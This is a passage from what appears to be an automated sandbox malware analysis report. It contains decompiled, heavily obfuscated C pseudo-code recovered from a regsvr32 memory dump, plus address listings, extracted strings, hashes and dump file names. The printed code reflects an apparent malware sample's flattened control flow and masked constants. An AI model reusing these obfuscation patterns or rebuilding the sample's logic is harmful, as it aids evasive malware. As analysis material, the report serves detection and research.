								_t680 = E04F7C91A(_v2648,  &_v2616, _v2640, _v2636, _v2644, _t749, _v2632, _v2644, _t749, _v2652, _t749);
								_t850 =  &(_t850[0xd]);
								__eflags = _t680;
								if(__eflags == 0) {
									_t841 = 0x21a0;
									_t681 = 0xce909;
									goto L25;
								} else {
									_t841 = 0xa569;
									while(1) {
										L1:
										goto L2;
									}
								}
							} else {
								__eflags = _t841 - 0xacb58;
								if(_t841 == 0xacb58) {
									_v2632 = 0xbf2b19;
									_v2632 = _v2632 >> 7;
									_v2632 = _v2632 ^ 0x0004568f;
									_v2652 = 0x35bf74;
									_v2652 = _v2652 ^ 0x18ee5d96;
									_t754 = 0x1e;
									_v2652 = _v2652 * 0x7b;
									_v2652 = _v2652 ^ 0x0e5a7422;
									_v2652 = _v2652 ^ 0xfff5fd76;
									_v2640 = 0x4bfb28;
									_v2640 = _v2640 ^ 0x375a42d1;
									_v2640 = _v2640 / _t754;
									_v2640 = _v2640 ^ 0x01d6907b;
									_t755 = _v2632;
									_t685 = E04F753D5(_t755, _v2652, _v2640, _v2624, _v2620);
									_t838 = _t685;
									_t850 =  &(_t850[3]);
									__eflags = _t685;
									_t681 = 0xce909;
									_t841 =  !=  ? 0xce909 : 0x7b46d;
									continue;
								} else {
									__eflags = _t841 - 0xb96e1;
									if(__eflags == 0) {
										_v2632 = 0x8d12e1;
										_t756 = 0x72;
										_v2632 = _v2632 * 0x4c;
										_v2632 = _v2632 ^ 0x29e47545;
										_v2644 = 0x47604;
										_t757 = 0x4b;
										_v2644 = _v2644 / _t756;
										_v2644 = _v2644 + 0xffff01e6;
										_v2644 = _v2644 ^ 0xfff8e99a;
										_v2648 = 0x64c442;
										_v2648 = _v2648 * 0x3d;
										_v2648 = _v2648 ^ 0x902b779c;
										_v2648 = _v2648 ^ 0x882f963b;
										_v2652 = 0xf42c3e;
										_v2652 = _v2652 + 0xffff1980;
										_v2652 = _v2652 >> 2;
										_v2652 = _v2652 / _t757;
										_v2652 = _v2652 ^ 0x00093bc1;
										_v2640 = 0x34a1a1;
										_v2640 = _v2640 | 0xc139c54e;
										_v2640 = _v2640 >> 1;
										_v2640 = _v2640 ^ 0x6095af12;
										_t755 = _v2632;
										E04F73B17(_t755, 0, __eflags, _v2644, _t757, _v2648,  &_v524, _v2652, 1, 0, _v2640);
										_t850 =  &(_t850[8]);
										_t841 = 0x690da;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										__eflags = _t841 - _t681;
										if(_t841 != _t681) {
											goto L25;
										} else {
											_v2652 = 0xf09340;
											_t781 = 0x47;
											_v2652 = _v2652 / _t781;
											_v2652 = _v2652 + 0xffffbe62;
											_t782 = 3;
											_v2652 = _v2652 / _t782;
											_v2652 = _v2652 ^ 0x000fa9a6;
											_v2640 = 0x10266;
											_v2640 = _v2640 + 0xffff4a23;
											_v2640 = _v2640 >> 6;
											_v2640 = _v2640 ^ 0x00026684;
											_v2636 = 0x80591d;
											_v2636 = _v2636 + 0x5389;
											_v2636 = _v2636 ^ 0x008ccb68;
											_v2632 = 0xca1411;
											_v2632 = _v2632 >> 3;
											_v2632 = _v2632 ^ 0x0015cb4f;
											_t731 = E04F7D6A7(_v2652, _v2640, _v2636, 0x4f618ac, _v2632);
											_v2640 = 0x4342d5;
											_v2640 = _v2640 + 0xcc91;
											_v2640 = _v2640 + 0x367e;
											_v2640 = _v2640 ^ 0x004a703d;
											_v2644 = 0xb6427d;
											_v2644 = _v2644 | 0x7f5e57ec;
											_v2644 = _v2644 ^ 0x7ff68a5d;
											_v2648 = 0xf61852;
											_v2648 = _v2648 + 0xffffd9f5;
											_v2648 = _v2648 ^ 0x00f3f524;
											_v2636 = 0x6706e1;
											_t784 = 0x77;
											_v2636 = _v2636 / _t784;
											_v2636 = _v2636 ^ 0x0004cf92;
											_v2632 = 0xfd52e8;
											_t785 = 0x68;
											_v2632 = _v2632 / _t785;
											_v2632 = _v2632 ^ 0x00021779;
											_v2652 = 0xd8488c;
											_v2652 = _v2652 ^ 0x26aa74ba;
											_v2652 = _v2652 | 0xe8b1659f;
											_t786 = 0x4a;
											_v2652 = _v2652 / _t786;
											_v2652 = _v2652 ^ 0x033a5c55;
											E04F7F342(_v2644, __eflags, _v2648, _t786, _v2636, _t731, _v2632, _t838,  &_v524,  &_v2604, _v2652,  &_v1044);
											_v2644 = 0xef06a6;
											_t788 = 0x4a;
											_v2644 = _v2644 / _t788;
											_t789 = 0x1d;
											_v2644 = _v2644 / _t789;
											_v2644 = _v2644 | 0xc03686df;
											_v2644 = _v2644 ^ 0xc037ccad;
											_v2652 = 0xe9ed7a;
											_v2652 = _v2652 * 0x53;
											_v2652 = _v2652 + 0xed62;
											_v2652 = _v2652 << 0xb;
											_v2652 = _v2652 ^ 0xc75dd1b6;
											_v2632 = 0xac613a;
											_v2632 = _v2632 + 0x2cc1;
											_v2632 = _v2632 ^ 0x00a66a31;
											_v2640 = 0x2c1801;
											_v2640 = _v2640 ^ 0x6fd3eb01;
											_v2640 = _v2640 ^ 0x8af09c85;
											_v2640 = _v2640 ^ 0xe505d530;
											_t818 = _v2652;
											_t755 = _v2644;
											E04F6845B(_t755, _v2652, _v2632, _v2640, _t731);
											_t850 =  &(_t850[0x10]);
											_t841 = 0xb96e1;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L28:
							return _t681;
						}
						if(_t856 == 0) {
							_v2652 = 0x5e22ff;
							_v2652 = _v2652 >> 0xa;
							_v2652 = _v2652 + 0x891e;
							_v2652 = _v2652 + 0xffff9948;
							_v2652 = _v2652 ^ 0x00052ce0;
							_v2644 = 0x15930a;
							_v2644 = _v2644 >> 0xe;
							_v2644 = _v2644 >> 5;
							_v2644 = _v2644 + 0xffffd872;
							_v2644 = _v2644 ^ 0xfff2ffde;
							_push(_t755);
							E04F75B9E(_v2652,  &_v2084, __eflags, _v2644);
							_v2652 = 0x9bff1c;
							_v2652 = _v2652 << 4;
							_v2652 = _v2652 + 0xffff210f;
							_v2652 = _v2652 ^ 0x09bb13c4;
							_v2648 = 0xc387de;
							_v2648 = _v2648 + 0x550d;
							_v2648 = _v2648 + 0x5190;
							_v2648 = _v2648 ^ 0x00c5ed92;
							 *((short*)(E04F73E30(_v2652,  &_v2084, _v2648))) = 0;
							_v2648 = 0x1c2036;
							_v2648 = _v2648 | 0x95033f26;
							_push(0x43);
							_v2648 = _v2648 / 0;
							_v2648 = _v2648 ^ 0x023762e9;
							_v2652 = 0xe490ea;
							_v2652 = _v2652 | 0x6724c31f;
							_v2652 = _v2652 / 0;
							_v2652 = _v2652 | 0xf66d6675;
							_v2652 = _v2652 ^ 0xff7907fa;
							E04F619C8(_v2648, _v2652, __eflags,  &_v1564);
							_v2636 = 0x6cc607;
							_v2636 = _v2636 + 0x7850;
							_v2636 = _v2636 ^ 0x006cc853;
							_v2648 = 0xcaa679;
							_v2648 = _v2648 >> 0xd;
							_v2648 = _v2648 ^ 0x7fc52cb4;
							_v2648 = _v2648 ^ 0x7fcb14b6;
							_v2632 = 0xe341d0;
							_v2632 = _v2632 | 0x92e5cee6;
							_v2632 = _v2632 ^ 0x92efc4a3;
							_v2652 = 0x37e43d;
							_t765 = 0x7c;
							_v2652 = _v2652 * 0x37;
							_v2652 = _v2652 / _t765;
							_v2652 = _v2652 << 0xd;
							_v2652 = _v2652 ^ 0x1945463c;
							_t705 = E04F7D6A7(_v2636, _v2648, _v2632, 0x4f6182c, _v2652);
							_v2640 = 0xd052;
							_v2640 = _v2640 >> 5;
							_v2640 = _v2640 * 0x57;
							_v2640 = _v2640 ^ 0x00043992;
							_v2644 = 0x2bd943;
							_v2644 = _v2644 | 0xf2d053aa;
							_v2644 = _v2644 ^ 0x6c346bd9;
							_v2644 = _v2644 << 7;
							_v2644 = _v2644 ^ 0x67dd26a0;
							_v2652 = 0x76ab4e;
							_v2652 = _v2652 | 0x8837f866;
							_v2652 = _v2652 >> 6;
							_v2652 = _v2652 + 0xffff015d;
							_v2652 = _v2652 ^ 0x022e1748;
							_v2648 = 0x63877e;
							_v2648 = _v2648 + 0xffff6af7;
							_v2648 = _v2648 * 0x6e;
							_v2648 = _v2648 ^ 0x2a83f75d;
							_v2632 = 0x495ea0;
							_v2632 = _v2632 >> 0xb;
							_v2632 = _v2632 ^ 0x00010118;
							E04F736BB( &_v2084, __eflags, _v2640 * 0x57, _v2644,  &_v1564, _v2652, _v2648, _t705, _v2632,  &_v2604);
							_v2652 = 0xfbf9d6;
							_v2652 = _v2652 ^ 0xe91b8a7a;
							_v2652 = _v2652 + 0xffff5a7f;
							_v2652 = _v2652 >> 7;
							_v2652 = _v2652 ^ 0x01deee18;
							_v2636 = 0x368558;
							_v2636 = _v2636 >> 0xb;
							_v2636 = _v2636 ^ 0x00045867;
							_v2640 = 0xe3bc40;
							_t769 = 0x7f;
							_v2640 = _v2640 / _t769;
							_v2640 = _v2640 >> 6;
							_v2640 = _v2640 ^ 0x000b35b0;
							_v2632 = 0x7cdfe4;
							_v2632 = _v2632 + 0x533c;
							_v2632 = _v2632 ^ 0x007610c0;
							E04F6845B(_v2652, _v2636, _v2640, _v2632, _t705);
							_v2652 = 0x8662bd;
							_v2652 = _v2652 + 0xffffe6db;
							_t850 =  &(_t850[0x11]);
							_v2652 = _v2652 ^ 0x67e344c1;
							_v2652 = _v2652 << 4;
							_v2652 = _v2652 ^ 0x7657acd5;
							_v2640 = 0x3c9e6c;
							_v2640 = _v2640 | 0xfe81c488;
							_v2640 = _v2640 + 0x7c18;
							_v2640 = _v2640 ^ 0xfeb2c716;
							_t681 = E04F775AD(_v2652, _v2640,  &_v2604, _t848);
							_t755 = 0xb;
							__eflags = _t681;
							if(__eflags != 0) {
								_t841 = 0x9f7bc;
								goto L1;
							}
						} else {
							if(_t841 == 0xa569) {
								_v2636 = 0x3bb098;
								_t755 =  &_v2616;
								_v2636 = _v2636 + 0xffff52c9;
								_v2636 = _v2636 ^ 0x0034959f;
								_v2644 = 0x3e0972;
								_v2644 = _v2644 + 0xa74c;
								_v2644 = _v2644 * 0x68;
								_v2644 = _v2644 << 1;
								_v2644 = _v2644 ^ 0x32e1b079;
								_v2632 = 0x10e8fa;
								_v2632 = _v2632 + 0xbc1d;
								_v2632 = _v2632 ^ 0x0013fa69;
								E04F7E71C(_t755, _v2636, _v2644,  &_v2624, _v2632);
								_t850 =  &(_t850[3]);
								asm("sbb esi, esi");
								_t841 = (_t841 & 0x0009e527) + 0xe631;
								while(1) {
									L1:
									goto L2;
								}
							} else {
								if(_t841 == 0xe631) {
									_v2636 = 0x9b81f4;
									_v2636 = _v2636 + 0xffff2ea5;
									_v2636 = _v2636 ^ 0x0097865d;
									_v2632 = 0x29f39f;
									_v2632 = _v2632 << 8;
									_v2632 = _v2632 ^ 0x29fbb508;
									_v2648 = 0xa831f5;
									_v2648 = _v2648 | 0xc04d373d;
									_v2648 = _v2648 ^ 0x962fd5f8;
									_v2648 = _v2648 >> 8;
									_t661 =  &_v2648;
									 *_t661 = _v2648 ^ 0x005775fc;
									__eflags =  *_t661;
									_t681 = E04F68B6C(_v2636, _v2616, _v2632, _v2648);
								} else {
									if(_t841 == 0x690da) {
										_v2644 = 0x6d3954;
										_v2644 = _v2644 ^ 0x8e6d6e43;
										_v2644 = _v2644 >> 0xf;
										_v2644 = _v2644 + 0xffff89b0;
										_v2644 = _v2644 ^ 0x000e9c7a;
										_v2636 = 0x2fa11;
										_v2636 = _v2636 + 0xffffe8e6;
										_v2636 = _v2636 ^ 0x000d3413;
										_v2632 = 0x655545;
										_v2632 = _v2632 + 0x8ca6;
										_v2632 = _v2632 ^ 0x006800ac;
										_t818 = _v2636;
										E04F7E4B2(_v2644, _v2636, __eflags, _v2632, _t838);
										_pop(_t755);
										_t841 = 0x7b46d;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t841 == 0x7b46d) {
											_v2636 = 0xbce14b;
											_v2636 = _v2636 << 5;
											_v2636 = _v2636 ^ 0x179f42e4;
											_v2632 = 0xcfb82a;
											_v2632 = _v2632 >> 0xc;
											_v2632 = _v2632 ^ 0x000b8b0a;
											_v2648 = 0x2407f2;
											_t778 = 0x1b;
											_v2648 = _v2648 / _t778;
											_v2648 = _v2648 ^ 0x70fea102;
											_v2648 = _v2648 ^ 0x70ff775a;
											_t818 = _v2632;
											E04F7E4B2(_v2636, _v2632, __eflags, _v2648, _v2624);
											_pop(_t755);
											_t841 = 0xe631;
											while(1) {
												L1:
												goto L2;
											}
										} else {
											if(_t841 != 0x92c5b) {
												goto L25;
											} else {
												_v2632 = 0x94374c;
												_v2632 = _v2632 + 0xefcc;
												_v2632 = _v2632 ^ 0x00952731;
												_v2652 = 0xbbb644;
												_v2652 = _v2652 | 0xcb16211d;
												_v2652 = _v2652 * 0xa;
												_v2652 = _v2652 ^ 0xf57183d2;
												_v2648 = 0xa6c16e;
												_v2648 = _v2648 >> 0xe;
												_v2648 = _v2648 >> 8;
												_v2648 = _v2648 ^ 0x0000d2b8;
												_v2636 = 0x73f758;
												_v2636 = _v2636 + 0xffff604c;
												_v2636 = _v2636 ^ 0x0074a264;
												_v2640 = 0xf52074;
												_v2640 = _v2640 | 0x691cbda6;
												_v2640 = _v2640 ^ 0x69fd79ee;
												_v2644 = 0x60d1c4;
												_v2644 = _v2644 | 0x357f227e;
												_v2644 = _v2644 * 0xc;
												_v2644 = _v2644 * 0x77;
												_v2644 = _v2644 ^ 0x6db1eb85;
												_t755 = _v2632;
												E04F79F8B(_t755, _t818, _t755, _v2652,  &_v1044, _v2648, _v2636, _t755, _v2640, _v2644);
												_t850 =  &(_t850[8]);
												_t841 = 0x9eecb;
												while(1) {
													L1:
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						goto L28;
						L25:
						__eflags = _t841 - 0x21a0;
					} while (__eflags != 0);
					goto L28;
				}
			}

0x04f701bf
0x04f701c5
0x04f701cd
0x04f701d5
0x04f701dc
0x04f701e3
0x04f701ea
0x04f701f1
0x04f701f9
0x04f701fe
0x04f70206
0x04f70219
0x04f7021b
0x04f70220
0x04f70225
0x04f70229
0x04f7022b
0x04f7022b
0x04f70230
0x04f70230
0x04f70230
0x04f70230
0x04f70236
0x00000000
0x00000000
0x04f7084d
0x04f70853
0x04f70c36
0x04f70c3e
0x04f70c46
0x04f70c4e
0x04f70c53
0x04f70c66
0x04f70c6a
0x04f70c72
0x04f70c7a
0x04f70c82
0x04f70c8a
0x04f70c92
0x04f70c9a
0x04f70ca2
0x04f70caa
0x04f70cb2
0x04f70cba
0x04f70cc7
0x04f70ccb
0x04f70cd3
0x04f70ce0
0x04f70ce4
0x04f70cec
0x04f70cf4
0x04f70cfc
0x04f70d04
0x04f70d09
0x04f70d30
0x04f70d34
0x04f70d3c
0x04f70d44
0x04f70d4c
0x04f70d51
0x04f70d59
0x04f70d61
0x04f70d69
0x04f70d71
0x04f70d79
0x04f70d81
0x04f70d89
0x04f70d91
0x04f70d9c
0x04f70da4
0x04f70da9
0x04f70db1
0x04f70db9
0x04f70dc1
0x04f70dc9
0x04f70dd1
0x04f70dd9
0x04f70de1
0x04f70de9
0x04f70e0d
0x04f70e12
0x04f70e15
0x04f70e17
0x04f70e23
0x04f70e28
0x00000000
0x04f70e19
0x04f70e19
0x04f7022b
0x04f7022b
0x00000000
0x04f7022b
0x04f7022b
0x04f70859
0x04f70859
0x04f7085f
0x04f70b9f
0x04f70ba9
0x04f70bae
0x04f70bb6
0x04f70bbe
0x04f70bcd
0x04f70bce
0x04f70bd2
0x04f70bda
0x04f70be2
0x04f70bea
0x04f70bf8
0x04f70bfc
0x04f70c14
0x04f70c18
0x04f70c1d
0x04f70c1f
0x04f70c22
0x04f70c29
0x04f70c2e
0x00000000
0x04f70865
0x04f70865
0x04f7086b
0x04f70ac1
0x04f70ad2
0x04f70ad5
0x04f70ad9
0x04f70ae1
0x04f70aef
0x04f70af0
0x04f70af6
0x04f70afe
0x04f70b06
0x04f70b13
0x04f70b17
0x04f70b1f
0x04f70b27
0x04f70b2f
0x04f70b37
0x04f70b44
0x04f70b4f
0x04f70b57
0x04f70b5f
0x04f70b67
0x04f70b6b
0x04f70b89
0x04f70b8d
0x04f70b92
0x04f70b95
0x04f7022b
0x04f7022b
0x00000000
0x04f7022b
0x04f70871
0x04f70871
0x04f70873
0x00000000
0x04f70879
0x04f70879
0x04f70889
0x04f7088e
0x04f70894
0x04f708a0
0x04f708a3
0x04f708a7
0x04f708af
0x04f708b7
0x04f708bf
0x04f708c4
0x04f708cc
0x04f708d4
0x04f708dc
0x04f708e4
0x04f708ec
0x04f708f1
0x04f7090e
0x04f70913
0x04f7091e
0x04f70928
0x04f70932
0x04f7093a
0x04f70942
0x04f7094a
0x04f70952
0x04f7095a
0x04f70962
0x04f7096a
0x04f70978
0x04f7097d
0x04f70983
0x04f7098b
0x04f70997
0x04f7099c
0x04f709a2
0x04f709aa
0x04f709b2
0x04f709ba
0x04f709c6
0x04f709c9
0x04f709d4
0x04f70a05
0x04f70a0a
0x04f70a1a
0x04f70a1f
0x04f70a29
0x04f70a2d
0x04f70a31
0x04f70a39
0x04f70a41
0x04f70a4e
0x04f70a52
0x04f70a5a
0x04f70a5f
0x04f70a67
0x04f70a6f
0x04f70a77
0x04f70a7f
0x04f70a87
0x04f70a8f
0x04f70a97
0x04f70aa7
0x04f70aab
0x04f70aaf
0x04f70ab4
0x04f70ab7
0x04f7022b
0x04f7022b
0x00000000
0x04f7022b
0x04f7022b
0x04f70873
0x04f7086b
0x04f7085f
0x04f70ea4
0x04f70eae
0x04f70eae
0x04f7023c
0x04f704cb
0x04f704da
0x04f704df
0x04f704e7
0x04f704ef
0x04f704f7
0x04f704ff
0x04f70504
0x04f70509
0x04f70511
0x04f70519
0x04f70522
0x04f70527
0x04f70536
0x04f7053b
0x04f70543
0x04f7054b
0x04f70553
0x04f7055b
0x04f70563
0x04f7057f
0x04f70582
0x04f7058a
0x04f70596
0x04f7059d
0x04f705a3
0x04f705ab
0x04f705b3
0x04f705c2
0x04f705cd
0x04f705d5
0x04f705e6
0x04f705eb
0x04f705f5
0x04f705fd
0x04f70605
0x04f7060d
0x04f70612
0x04f7061a
0x04f70622
0x04f7062a
0x04f70632
0x04f7063a
0x04f7064a
0x04f7064b
0x04f70655
0x04f70659
0x04f7065e
0x04f7067b
0x04f70680
0x04f7068f
0x04f7069e
0x04f706a2
0x04f706aa
0x04f706b2
0x04f706ba
0x04f706c2
0x04f706c7
0x04f706cf
0x04f706d7
0x04f706df
0x04f706e4
0x04f706ec
0x04f706f4
0x04f706fc
0x04f70709
0x04f70711
0x04f70719
0x04f70721
0x04f70726
0x04f7074d
0x04f70752
0x04f7075c
0x04f70764
0x04f7076c
0x04f70771
0x04f70779
0x04f70781
0x04f70786
0x04f7078e
0x04f7079c
0x04f707a0
0x04f707a4
0x04f707a9
0x04f707b1
0x04f707b9
0x04f707c1
0x04f707d9
0x04f707de
0x04f707ea
0x04f707f2
0x04f707f5
0x04f707fd
0x04f70802
0x04f7080a
0x04f70812
0x04f7081a
0x04f70822
0x04f70834
0x04f7083a
0x04f7083b
0x04f7083d
0x04f70843
0x00000000
0x04f70843
0x04f70242
0x04f70248
0x04f70444
0x04f7044c
0x04f70450
0x04f70458
0x04f70460
0x04f70468
0x04f70475
0x04f7047d
0x04f70481
0x04f70489
0x04f70491
0x04f70499
0x04f704ae
0x04f704b3
0x04f704b8
0x04f704c0
0x04f7022b
0x04f7022b
0x00000000
0x04f7022b
0x04f7024e
0x04f70254
0x04f70e3b
0x04f70e43
0x04f70e4b
0x04f70e53
0x04f70e5b
0x04f70e60
0x04f70e68
0x04f70e70
0x04f70e78
0x04f70e80
0x04f70e85
0x04f70e85
0x04f70e85
0x04f70e9d
0x04f7025a
0x04f70260
0x04f703d1
0x04f703d9
0x04f703e1
0x04f703e6
0x04f703ee
0x04f703f6
0x04f703fe
0x04f70406
0x04f7040e
0x04f70416
0x04f7041e
0x04f7042b
0x04f70433
0x04f70439
0x04f7043a
0x04f7022b
0x04f7022b
0x00000000
0x04f7022b
0x04f70266
0x04f7026c
0x04f7035f
0x04f70369
0x04f7036e
0x04f70376
0x04f7037e
0x04f70383
0x04f7038b
0x04f70399
0x04f7039c
0x04f703a0
0x04f703a8
0x04f703b8
0x04f703c0
0x04f703c6
0x04f703c7
0x04f7022b
0x04f7022b
0x00000000
0x04f7022b
0x04f70272
0x04f70278
0x00000000
0x04f7027e
0x04f7027e
0x04f70286
0x04f7028e
0x04f70296
0x04f7029e
0x04f702ab
0x04f702af
0x04f702b7
0x04f702bf
0x04f702c4
0x04f702c9
0x04f702d1
0x04f702d9
0x04f702e1
0x04f702e9
0x04f702f1
0x04f702f9
0x04f70301
0x04f70309
0x04f70316
0x04f7031f
0x04f7032a
0x04f70349
0x04f7034d
0x04f70352
0x04f70355
0x04f7022b
0x04f7022b
0x00000000
0x04f7022b
0x04f7022b
0x04f70278
0x04f7026c
0x04f70260
0x04f70254
0x04f70248
0x00000000
0x04f70e2d
0x04f70e2d
0x04f70e2d
0x00000000
0x04f70e39

Strings

Px, xrefs: 04F705F5
z, xrefs: 04F70A41
Eu), xrefs: 04F70AD9
=pJ, xrefs: 04F70932
b, xrefs: 04F70A52
EUe, xrefs: 04F7040E
[,, xrefs: 04F70272
[,, xrefs: 04F7021B
<S, xrefs: 04F707B9
Ny, xrefs: 04F70D89
m6I, xrefs: 04F70CD3
~B, xrefs: 04F70D3C

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: <S$=pJ$EUe$Eu)$Ny$Px$[,$[,$b$m6I$z$~B
API String ID: 2591292051-1139866971
Opcode ID: 226514c74c8bc23803a0844689227a696147994f0a7b9f77ed1b31ebba7c2e51
Instruction ID: 6673e48328412f5696a6bbd00bfa534ea86d0ed8484554c24d944088657aa058
Opcode Fuzzy Hash: 226514c74c8bc23803a0844689227a696147994f0a7b9f77ed1b31ebba7c2e51
Instruction Fuzzy Hash: AF621FB24083429FC358CF21D94A90BBBE1BBD8758F104E1DF1D9A6260D7B49A49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 04F7630A Relevance: 15.4, Strings: 12, Instructions: 439
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F7630A() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				char _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				void* _t465;
				void* _t469;
				signed int _t477;
				void* _t491;
				signed int _t498;
				void* _t501;
				signed int _t522;
				intOrPtr _t523;
				signed int _t524;
				void* _t525;
				signed int _t526;
				signed int _t528;
				signed int _t529;
				signed int _t531;
				signed int _t533;
				signed int _t541;
				signed int _t543;
				signed int _t544;
				intOrPtr _t545;
				signed int _t548;
				signed int _t549;
				void* _t583;
				signed int _t586;
				signed int* _t589;

				_t589 =  &_v1092;
				_v1052 = 0x73a87;
				_v1060 = 0;
				_t522 = _v1060;
				_v1048 = 0xb0ea8;
				_t583 = 0x22545;
				_v1044 = 0;
				while(1) {
					L1:
					_t525 = 0x5c;
					while(1) {
						L2:
						_t465 = 0x7afce;
						do {
							L3:
							if(_t583 == 0x11eec) {
								_v1068 = 0xe14746;
								_t278 =  &_v1068; // 0xe14746
								_t526 = 0x27;
								_v1068 =  *_t278 / _t526;
								_v1068 = _v1068 ^ 0x000b731c;
								_v1084 = 0xc7a6e1;
								_v1084 = _v1084 * 0x3b;
								_v1084 = _v1084 << 0xd;
								_v1084 = _v1084 ^ 0x3839000e;
								_v1084 = _v1084 ^ 0x56832fa4;
								_v1088 = 0xe20d79;
								_v1088 = _v1088 | 0x281d8348;
								_v1088 = _v1088 ^ 0x28fe5024;
								_v1092 = 0xaecc65;
								_v1092 = _v1092 >> 0xb;
								_v1092 = _v1092 + 0x9234;
								_v1092 = _v1092 + 0xfffff5a6;
								_v1092 = _v1092 ^ 0x000ac069;
								_t469 = E04F7D6A7(_v1068, _v1084, _v1088, 0x4f6145c, _v1092);
								_v1084 = 0xc75b95;
								_v1084 = _v1084 | 0x67402753;
								_v1084 = _v1084 + 0xffff2650;
								_t528 = 0x2a;
								_v1084 = _v1084 * 0x6a;
								_v1084 = _v1084 ^ 0x7840cc27;
								_v1088 = 0x112b0b;
								_v1088 = _v1088 << 8;
								_t529 = 0x36;
								_v1088 = _v1088 / _t528;
								_v1088 = _v1088 ^ 0x0068a4d7;
								_v1072 = 0xcb0ca2;
								_v1072 = _v1072 | 0x6c7f153e;
								_v1072 = _v1072 / _t529;
								_v1072 = _v1072 >> 8;
								_v1072 = _v1072 ^ 0x000ac0f4;
								_v1080 = 0x2e627c;
								_v1080 = _v1080 | 0xc621b9b8;
								_v1080 = _v1080 >> 4;
								_v1080 = _v1080 >> 0xf;
								_v1080 = _v1080 ^ 0x000d1732;
								_v1068 = 0xabea71;
								_v1068 = _v1068 + 0xffff7ab9;
								_v1068 = _v1068 + 0x367d;
								_v1068 = _v1068 ^ 0x00a3d7da;
								_v1064 = 0xbc7b42;
								_v1064 = _v1064 + 0xe857;
								_v1064 = _v1064 + 0xffff7ab3;
								_v1064 = _v1064 ^ 0x00b4b32b;
								_v1076 = 0x1b8d8d;
								_v1076 = _v1076 * 0x45;
								_v1076 = _v1076 | 0x503fe4f7;
								_v1076 = _v1076 ^ 0x577774b7;
								_v1092 = 0x461025;
								_v1092 = _v1092 + 0xffffbc4d;
								_v1092 = _v1092 << 0xe;
								_v1092 = _v1092 << 9;
								_v1092 = _v1092 ^ 0x3908fa4f;
								_t477 = E04F6CBEC(_v1072, _t529, _v1080, _v1088, _v1068, _v1064, _t469, _t529, _v1076, _t529, _t529, _v1084,  &_v1056, _v1092);
								_v1088 = 0x8cbd01;
								__eflags = _t477;
								_t583 =  ==  ? 0x7afce : 0x89675;
								_v1088 = _v1088 + 0xa49d;
								_v1088 = _v1088 + 0x70eb;
								_v1088 = _v1088 ^ 0x00855983;
								_v1092 = 0xd7b66a;
								_v1092 = _v1092 >> 0xb;
								_v1092 = _v1092 | 0xeee52018;
								_t531 = 0x1b;
								_v1092 = _v1092 / _t531;
								_v1092 = _v1092 ^ 0x08df5a33;
								_v1068 = 0x677024;
								_t415 =  &_v1068; // 0x677024
								_v1068 =  *_t415 * 0x5d;
								_v1068 = _v1068 ^ 0x259e1680;
								_v1072 = 0xb47acd;
								_v1072 = _v1072 ^ 0x518e4523;
								_v1072 = _v1072 >> 0xa;
								_v1072 = _v1072 + 0xffff15be;
								_t426 =  &_v1072;
								 *_t426 = _v1072 ^ 0x0019271d;
								__eflags =  *_t426;
								E04F6845B(_v1088, _v1092, _v1068, _v1072, _t469);
								_t589 =  &(_t589[0x13]);
								_t465 = 0x7afce;
								_t525 = 0x5c;
								goto L17;
							} else {
								if(_t583 == 0x22545) {
									_v1084 = 0xfda078;
									_v1084 = _v1084 >> 0xf;
									_t533 = 0x55;
									_v1084 = _v1084 / _t533;
									_v1084 = _v1084 ^ 0x51e08317;
									_v1084 = _v1084 ^ 0x51e0833b;
									_v1080 = 0x22763b;
									_v1080 = _v1080 | 0x7292cfc5;
									_v1080 = _v1080 ^ 0x2d1eec5a;
									_v1080 = _v1080 ^ 0x5fa764b7;
									_v1072 = 0xf54361;
									_v1072 = _v1072 << 2;
									_v1072 = _v1072 << 6;
									_v1072 = _v1072 ^ 0xf54861c8;
									_v1092 = 0x85f2f1;
									_v1092 = _v1092 << 3;
									_v1092 = _v1092 + 0x2430;
									_v1092 = _v1092 * 0x7b;
									_v1092 = _v1092 ^ 0x02efd399;
									_v1088 = 0xf80e06;
									_v1088 = _v1088 + 0xffff5c61;
									_v1088 = _v1088 ^ 0x00fa3f4b;
									_v1076 = 0x7fb75;
									_v1076 = _v1076 ^ 0x8e291505;
									_v1076 = _v1076 >> 0xf;
									_v1076 = _v1076 ^ 0x00027b15;
									E04F79F8B(_v1084, _v1084 % _t533, _t533, _v1080,  &_v520, _v1072, _v1092, _t533, _v1088, _v1076);
									_t589 =  &(_t589[8]);
									_t583 = 0xa2657;
									goto L1;
								} else {
									if(_t583 == _t465) {
										_v1092 = 0x4990;
										_v1092 = _v1092 ^ 0x4b5c76d0;
										_v1092 = _v1092 + 0xffff7265;
										_v1092 = _v1092 * 0x27;
										_v1092 = _v1092 ^ 0x7af81022;
										_v1088 = 0x959a5a;
										_v1088 = _v1088 >> 0xd;
										_v1088 = _v1088 ^ 0x000cbe6c;
										_v1080 = 0xf9953a;
										_v1080 = _v1080 + 0xffffd6c4;
										_v1080 = _v1080 + 0xffff16f4;
										_v1080 = _v1080 << 0xd;
										_v1080 = _v1080 ^ 0x105cd212;
										_v1076 = 0x6d0b05;
										_v1076 = _v1076 << 0xf;
										_v1076 = _v1076 * 0x4a;
										_v1076 = _v1076 ^ 0x97b1f48e;
										_v1084 = 0x503989;
										_v1084 = _v1084 | 0x44b0e891;
										_v1084 = _v1084 ^ 0x397097ea;
										_v1084 = _v1084 + 0xffff36a2;
										_v1084 = _v1084 ^ 0x7d7e15bb;
										_t491 = E04F7E40B(_v1088, _v1080, _v1076,  &_v1040, _v1084);
										_v1068 = 0x9534c7;
										_v1068 = _v1068 | 0x9d6f5a1c;
